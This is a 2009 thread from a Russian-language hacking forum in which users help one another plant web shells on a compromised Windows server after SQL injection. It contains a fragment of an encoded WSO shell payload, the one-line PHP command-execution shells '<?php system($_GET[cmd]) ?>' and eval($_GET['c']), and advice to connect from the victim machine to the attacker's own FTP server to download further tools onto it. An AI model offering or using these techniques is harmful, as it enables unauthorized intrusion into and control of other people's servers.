HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9551  
Старый 24.10.2009, 15:24
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

Большое спасибо. Попробую пока конфиги почитать, мож найду абсолютный путь... а то не охота брутить его, хотя видюха с CUDA реально великая вещь в этом деле.
 
Ответить с цитированием

  #9552  
Старый 24.10.2009, 17:59
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:
Цитата:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 2

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 3

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 4

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 5

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php(6) : regexp code on line 1

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php(6) : regexp code on line 1

Parse error: parse error, unexpected T_STRING in ..\..\..\..\\results.php(6) : regexp code on line 1

Fatal error: preg_replace(): Failed evaluating code: \x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y 7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWa d+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDN yxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ 5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06Po S+8WeQ70diFHiGW4ECPQjeeh1PmRV3OKDLxOWccQD8r2ykMNnY cB2uxPNRA3iNo9kel7vvj0zNgwgwJlIBwAKYIXUTB22DkTcuct oHnlq3tPjCIG3a2gfUmbOLG42DQBr6KO++dKFoE4aDFtr3pbB6 z+HbmtmfiK5s6E/7W0ZOjeQ8an107/txt252O3dneQMzwRxRkCaqwfde8CDuVIQ+fYgecTwZP0xz9Gmo C4++SVWAAPMJsfLBCG83jcRdJgB7597+xtctMYcQGOLcx1Yas7 IcfWJlx7HpKhcHIMBDBf4hpNZLaLA7nLnaHC4ML8yVtDF9 in ..\..\..\..\\results.php on line 6
шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
 
Ответить с цитированием

  #9553  
Старый 24.10.2009, 18:01
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

лей <?php system($_GET[cmd]) ?> а через него зальеш уже все полноценный если надо будет
 
Ответить с цитированием

  #9554  
Старый 24.10.2009, 18:02
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от M1ks  
Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:

шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
Зачем сразу весь шелл? Для начала eval($_GET['c']);
 
Ответить с цитированием

  #9555  
Старый 24.10.2009, 18:02
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

а в вин как лить через кмд?
 
Ответить с цитированием

  #9556  
Старый 24.10.2009, 18:04
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

через команду ftp подконекться к своему фтпешнику и слей что нужно, или можеш попробывать создать нужный тебе файл примерно так
Код:
echo "<?php phpinfo(); ?>" > test.php

Последний раз редактировалось warlok; 24.10.2009 в 18:07..
 
Ответить с цитированием

  #9557  
Старый 24.10.2009, 18:07
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

на том серве нет фтп, там ток ввв порт опен
 
Ответить с цитированием

  #9558  
Старый 24.10.2009, 18:09
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
на том серве нет фтп, там ток ввв порт опен
ты непонял, на том сервере фтп и ненадо ты с него подключаеш к левому и скачиваеш на тачку жетву.
 
Ответить с цитированием

  #9559  
Старый 24.10.2009, 18:09
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

всё спс, понял
 
Ответить с цитированием

  #9560  
Старый 24.10.2009, 19:35
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию

чето не получается, я ввожу ftp и адрес, он просит логин.. но ввести я не могу, как быть?

пытался отключить экранирование, в хтаккес прописывал php_value magic_quotes_sybase 0
но сервер не реагирует на него почемуто..

если кто желает помочь) пишите в аську)

Последний раз редактировалось M1ks; 24.10.2009 в 19:39..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ